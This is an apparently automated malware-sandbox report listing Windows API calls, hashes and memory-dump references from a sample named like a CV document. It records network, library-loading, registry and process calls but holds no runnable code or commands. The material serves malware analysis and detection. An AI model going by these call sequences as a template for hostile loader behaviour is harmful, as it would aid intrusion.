                                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                                            • String ID: 0
                                                                                            • API String ID: 1173514356-4108050209
                                                                                            • Opcode ID: 87905a6051f8ef1a3f3e99801e10c0b952bc0bd7659e098a60abbca28b6e8626
                                                                                            • Instruction ID: 6190c2ab1e0487c2be037fa77ed1a5cf3d3b3ac3ea409b5c38bb3682fa50f8de
                                                                                            • Opcode Fuzzy Hash: 87905a6051f8ef1a3f3e99801e10c0b952bc0bd7659e098a60abbca28b6e8626
                                                                                            • Instruction Fuzzy Hash: 3541BF702057019FD720DF24D881B6BBBE9AF89314F044A1EF9A5972D1D7B0E940CF62
                                                                                            APIs
                                                                                            • CharLowerBuffW.USER32(?,?,?,?), ref: 00120587
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharLower
                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                            • API String ID: 2358735015-567219261
                                                                                            • Opcode ID: c408dff0f3f6248962016ae890a236e6569f6c9acd21ae12072d0da377f01248
                                                                                            • Instruction ID: 7c958ff5a65c8b7ed5cbfa41d9b56d073ed34f1c74ce8887770e6e89c9d932a7
                                                                                            • Opcode Fuzzy Hash: c408dff0f3f6248962016ae890a236e6569f6c9acd21ae12072d0da377f01248
                                                                                            • Instruction Fuzzy Hash: 4031B230500216AFCF00EF94D941EEEB3B4FF59314B10862AE826A76D2DB71A916CB90
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000FB88E
                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000FB8A1
                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 000FB8D1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 3850602802-1403004172
                                                                                            • Opcode ID: d456382bf6ecdaaaac6f0901ae0376d3805167f58dbd594c0930dd2f10fe187c
                                                                                            • Instruction ID: 3d7b613ed5aa284932d348cef1f837bf4feddb536939591c17ef38e2ef719485
                                                                                            • Opcode Fuzzy Hash: d456382bf6ecdaaaac6f0901ae0376d3805167f58dbd594c0930dd2f10fe187c
                                                                                            • Instruction Fuzzy Hash: 7021E475A00108AFDB14ABA4D886DFE77B8DF86350B14412DF125A71E2DF744D06AB60
                                                                                            APIs
                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00114401
                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00114427
                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00114457
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0011449E
                                                                                              • Part of subcall function 00115052: GetLastError.KERNEL32(?,?,001143CC,00000000,00000000,00000001), ref: 00115067
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                            • String ID:
                                                                                            • API String ID: 1951874230-3916222277
                                                                                            • Opcode ID: 4fb4ac2dd264935fbc183895413b5e1616deaea71d1128152e9891d845842fa7
                                                                                            • Instruction ID: e1879386123214e1abfa4365df243b17111afae1ff941481660f1b1d821929dd
                                                                                            • Opcode Fuzzy Hash: 4fb4ac2dd264935fbc183895413b5e1616deaea71d1128152e9891d845842fa7
                                                                                            • Instruction Fuzzy Hash: 8421CFB6600208BFEB159F94DC85EFFB6ECEB49B48F10802AF109A2550EB749D859770
                                                                                            APIs
                                                                                              • Part of subcall function 000DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000DD1BA
                                                                                              • Part of subcall function 000DD17C: GetStockObject.GDI32(00000011), ref: 000DD1CE
                                                                                              • Part of subcall function 000DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 000DD1D8
                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0012915C
                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00129163
                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00129178
                                                                                            • DestroyWindow.USER32(?), ref: 00129180
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                            • String ID: SysAnimate32
                                                                                            • API String ID: 4146253029-1011021900
                                                                                            • Opcode ID: c1c534ede1647d76927ff28e6fa06b3c832a44f2089154940e9f7b0c8a801a75
                                                                                            • Instruction ID: d2eed3cfab3ef1014ceb51549ff39b91ab1b7547d1a4969e2ee85b2d68325309
                                                                                            • Opcode Fuzzy Hash: c1c534ede1647d76927ff28e6fa06b3c832a44f2089154940e9f7b0c8a801a75
                                                                                            • Instruction Fuzzy Hash: B6219F71200216BBEF204F69EC85EBA37ADFF99374F100619F954961A0D771DC71A760
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00109588
                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001095B9
                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 001095CB
                                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00109605
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHandle$FilePipe
                                                                                            • String ID: nul
                                                                                            • API String ID: 4209266947-2873401336
                                                                                            • Opcode ID: 1d873f46dead413d98cc6f23379dd83d823dd14fd4786ef5362fca25c2e74cc5
                                                                                            • Instruction ID: 2396cbbb273b1df0fa48e3e3c10cc0294936b2187c83228a2f0cbb9856d8a244
                                                                                            • Opcode Fuzzy Hash: 1d873f46dead413d98cc6f23379dd83d823dd14fd4786ef5362fca25c2e74cc5
                                                                                            • Instruction Fuzzy Hash: D6219074600305ABDB219F26DC15E9A7BF8AF56720F604A1AFCE1D72E1D7B0D940CB10
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00109653
                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00109683
                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00109694
                                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001096CE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHandle$FilePipe
                                                                                            • String ID: nul
                                                                                            • API String ID: 4209266947-2873401336
                                                                                            • Opcode ID: 73b1808f21b987782a4b39d5195a8354ec39449beee3978274380381dccf27b8
                                                                                            • Instruction ID: d6e92f765dcb29333b133dea281936928118d9b4046fc5ad85b3e9d7cfcfe3fc
                                                                                            • Opcode Fuzzy Hash: 73b1808f21b987782a4b39d5195a8354ec39449beee3978274380381dccf27b8
                                                                                            • Instruction Fuzzy Hash: 132183756002059BDB209F69DC64E9A77E8AF55734F200A19FCE1D72D1D7F1D881CB50
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0010DB0A
                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0010DB5E
                                                                                            • __swprintf.LIBCMT ref: 0010DB77
                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0015DC00), ref: 0010DBB5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                                            • String ID: %lu
                                                                                            • API String ID: 3164766367-685833217
                                                                                            • Opcode ID: 496d5baa878072ea70104000de2d01e45e6ec3e733da185b1924f03980242088
                                                                                            • Instruction ID: 70f48179e67253ed3f2254e11b791c9eb6175118cef72c8e71b31adb56e1ba50
                                                                                            • Opcode Fuzzy Hash: 496d5baa878072ea70104000de2d01e45e6ec3e733da185b1924f03980242088
                                                                                            • Instruction Fuzzy Hash: 2321AA35600148AFCB10EF95DD85EEEBBB8EF49704B014069F509E7261DB70EE41CB61
                                                                                            APIs
                                                                                              • Part of subcall function 000FC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000FC84A
                                                                                              • Part of subcall function 000FC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000FC85D
                                                                                              • Part of subcall function 000FC82D: GetCurrentThreadId.KERNEL32 ref: 000FC864
                                                                                              • Part of subcall function 000FC82D: AttachThreadInput.USER32(00000000), ref: 000FC86B
                                                                                            • GetFocus.USER32 ref: 000FCA05
                                                                                              • Part of subcall function 000FC876: GetParent.USER32(?), ref: 000FC884
                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 000FCA4E
                                                                                            • EnumChildWindows.USER32(?,000FCAC4), ref: 000FCA76
                                                                                            • __swprintf.LIBCMT ref: 000FCA90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                            • String ID: %s%d
                                                                                            • API String ID: 3187004680-1110647743
                                                                                            • Opcode ID: 39d284ebb3ac8d5a5c3358d24f320e5d437aa0712c0dc7bdc44d62729fec7062
                                                                                            • Instruction ID: e4bc7b1b31f866f2c40ee991c715031669abc1484e32a119edd76cdd8b6533d8
                                                                                            • Opcode Fuzzy Hash: 39d284ebb3ac8d5a5c3358d24f320e5d437aa0712c0dc7bdc44d62729fec7062
                                                                                            • Instruction Fuzzy Hash: CE116D7560020D6ADF11BFA09D86FFD3768AB45714F04806AFF09AA183DB709946EB71
                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001219F3
                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00121A26
                                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00121B49
                                                                                            • CloseHandle.KERNEL32(?), ref: 00121BBF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                            • String ID:
                                                                                            • API String ID: 2364364464-0
                                                                                            • Opcode ID: 95d0e4618b7187a58de1887b5f8eb8ee5229ce3836124c814e3397748dd5bf56
                                                                                            • Instruction ID: 5e5ccfe9d269e43ab75fd4d6fb32baff7e9f4dca571f433a410bf4b3bf2285f8
                                                                                            • Opcode Fuzzy Hash: 95d0e4618b7187a58de1887b5f8eb8ee5229ce3836124c814e3397748dd5bf56
                                                                                            • Instruction Fuzzy Hash: 55817F74600314ABDF10EF64D886BADBBF5AF18720F14845AF905AF382DBB4AD418F90
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0012E1D5
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0012E20D
                                                                                            • IsDlgButtonChecked.USER32(?,00000001), ref: 0012E248
                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0012E269
                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0012E281
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3188977179-0
                                                                                            • Opcode ID: 88ebc7c68848c71a125d93c6b2b4708cf42143c29cb801d248a55650467826b3
                                                                                            • Instruction ID: c1c9f078ea949b499436dcc75180b45f3f481cf2c8c37fa379c6afc584e2e363
                                                                                            • Opcode Fuzzy Hash: 88ebc7c68848c71a125d93c6b2b4708cf42143c29cb801d248a55650467826b3
                                                                                            • Instruction Fuzzy Hash: 8F61BE35A00224AFDB24DF58E894FEA77FAAB4A300F154069F899973A1D771A961CB10
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(?), ref: 00101CB4
                                                                                            • VariantClear.OLEAUT32(00000013), ref: 00101D26
                                                                                            • VariantClear.OLEAUT32(00000000), ref: 00101D81
                                                                                            • VariantClear.OLEAUT32(?), ref: 00101DF8
                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00101E26
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                                            • String ID:
                                                                                            • API String ID: 4136290138-0
                                                                                            • Opcode ID: bd060a3d2db2e57873bc50cc155843a45f4700b6ea5670758ed9606b3f0fd32e
                                                                                            • Instruction ID: d21e64e1ecaf4335d3633f616205864e5607b150bba1a2db5936ea342ddb06a2
                                                                                            • Opcode Fuzzy Hash: bd060a3d2db2e57873bc50cc155843a45f4700b6ea5670758ed9606b3f0fd32e
                                                                                            • Instruction Fuzzy Hash: 6D5169B5A00209EFCB14CF58C884AAAB7B8FF4D314B158559ED49DB350E374EA51CFA0
                                                                                            APIs
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 001206EE
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0012077D
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0012079B
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 001207E1
                                                                                            • FreeLibrary.KERNEL32(00000000,00000004), ref: 001207FB
                                                                                              • Part of subcall function 000DE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0010A574,?,?,00000000,00000008), ref: 000DE675
                                                                                              • Part of subcall function 000DE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0010A574,?,?,00000000,00000008), ref: 000DE699
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                            • String ID:
                                                                                            • API String ID: 327935632-0
                                                                                            • Opcode ID: 535cd51906fc56a69d38b543f95f66d3f27908469bcab406f9901e1a1694c6b0
                                                                                            • Instruction ID: e9c7a868be5ab94092dd94f0e76d856ef8aa0d9ba9d6f589793ee3280f65f8e2
                                                                                            • Opcode Fuzzy Hash: 535cd51906fc56a69d38b543f95f66d3f27908469bcab406f9901e1a1694c6b0
                                                                                            • Instruction Fuzzy Hash: 35516776A00215DFCB01EFA8D885EEDB7B5BF5D310B04816AE945AB362DB30ED41CB90
                                                                                            APIs
                                                                                              • Part of subcall function 00123C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00122BB5,?,?), ref: 00123C1D
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00122EEF
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00122F2E
                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00122F75
                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00122FA1
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00122FAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                            • String ID:
                                                                                            • API String ID: 3740051246-0
                                                                                            • Opcode ID: 564ba2fea772e1eed1c9e0efc4fba7d400603bdcdb15175ab1ae65bf893d8399
                                                                                            • Instruction ID: 0896710687f544deabaa2f857124d49741ae428136cc35cccd8b4b0164d6fb49
                                                                                            • Opcode Fuzzy Hash: 564ba2fea772e1eed1c9e0efc4fba7d400603bdcdb15175ab1ae65bf893d8399
                                                                                            • Instruction Fuzzy Hash: 76514971208204AFD704EF64D991FAEB7F9BF88304F04492DF595972A2EB70E914CB52
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1aea34b79bab60a900b4531d2b77660b628d5ab9d0537d05866c6804f135005d
                                                                                            • Instruction ID: a4c10aa65987d4b5b9ffad3f532f01e0b0fd20b6d2cfd9fd574dd29ecfd7d4ef
                                                                                            • Opcode Fuzzy Hash: 1aea34b79bab60a900b4531d2b77660b628d5ab9d0537d05866c6804f135005d
                                                                                            • Instruction Fuzzy Hash: 9E41E739900128AFCB14DBA8EC44FAD7F69EB09310F160265FA59A71E1D770AD61D6D0
                                                                                            APIs
                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001112B4
                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 001112DD
                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0011131C
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00111341
                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00111349
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
